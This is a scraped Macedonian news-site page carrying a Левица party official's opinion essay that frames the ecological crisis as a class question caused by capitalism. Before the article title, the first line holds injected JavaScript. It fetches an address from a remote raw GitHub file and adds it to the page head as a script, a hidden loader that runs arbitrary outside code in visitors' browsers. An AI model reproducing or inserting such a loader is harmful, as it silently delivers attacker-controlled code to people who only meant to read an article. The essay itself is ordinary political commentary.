;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Еко-проблемот е фундаментално класно прашање! - Антропол
АктуелноЛокалноСтав

Еко-проблемот е фундаментално класно прашање!

Реџеп Исмаил (Хактан)
Член на Президиумот на Левица

Познато е дека решението на одреден проблем не може да дојде од околностите во кои истиот е создаден. Токму со таков проблем се соочуваат контра-социјалистичките центри кои нудат (и/или ветуваат) некакви решенија за ваквата наша алармантна еколошка состојба. Имено, сите нивни „програми“ и „итни мерки“ воопшто не се дистанцираат (напротив тие се усогласени) од императивите на граѓанската економија за максимизирање и растот на профитот. А пак, да не зборуваме за нивната логичка захефтаност за приватната сопственост на средствата за производство.

Притоа, овие фанатици на капитализмот, создаваат илузија дека развојот на технологијата може да не’ спаси од оваа еко криза, па така таа станува „магично стапче“ кое во рацете на капиталистите ќе ги реши овие проблеми, а растот ќе продолжи во бесконечност!? За жал, хегемонијата на капитализмот успева да создаде лојални идиоти кои остануваат заробени во концентрациониот логор на пазарот. Некои од нив дури и мислат оти преку граѓанските механизми од типот на протести, на парламентот може да му се наложи да донесе закон со кој ќе му се заповеда на воздухот да биде чист!?

Во суштина, еколошката криза е само составен дел од општата егзистенцијална и социјална криза создадена од самиот пазар. И во таа насока, една од најпогубните негови карактеристики е што тој, преку културната хегемонија како надградба на неговата економска база, негацијата ја претвора во нејзина потврда, односно афирмација. Па така, проблемот створен од самиот пазар постанува засебна индустрија каде се продаваат и произведуваат машини и услуги за превенирање или заштита од проблемот.

Граѓанската логика на постојан раст во ограничена планета очигледно дека систематски не’ убива. Економијата на црпење од планетата земја, повеќе и побрзо од нејзиниот капацитет да се регенерира, води во бездна. Според тоа, за да ја осигураме нашата иднина ние мора да ја промениме сегашноста – мора да ја промениме економијата!

Трагањето по решението за овој проблем мора да биде втемелено на тоа дека еко-проблемот е фундаментално класно прашање, воедно и производ на нашиот расипан економски систем, секако сето тоа е во комбинација со нашата периферна гео-политичка позиција и империјалистика потиснатост, корумпирана Власт и слично – околности кои само ги интензивираат последиците кон еко-системот од ваквата економска структура.

Маркс и Енгелс, обајцата тврдеа дека еколошки одржливото општество ќе бара „укинување на антитезата меѓу градот и земјата“. Енгелс во една прилика ќе нагласи дека тоа значи „што е можно подеднакво распределување на населението во целата земја“ и „интегрална врска помеѓу индустриското и земјоделското производство“.

Ние мора идејата за животен стандард да ја спротивставиме на потрошувачкиот стандард кој е подреден на стекнување профит – а безгрижен за опстанокот на животот! Приватната сопственост, едноставно во корен е спротивна на идејата за држава, и од аспект на ова во државата како повисока социо-економска формација, приватната сопственост на одредени поединци на земјата е исто апсурдна како приватниот посед на еден човек врз друг човек. Засега, капиталистичката магија преку стапчето на империјализмот не’ претвара во стаорци, а нашата земја/држава во европско буниште!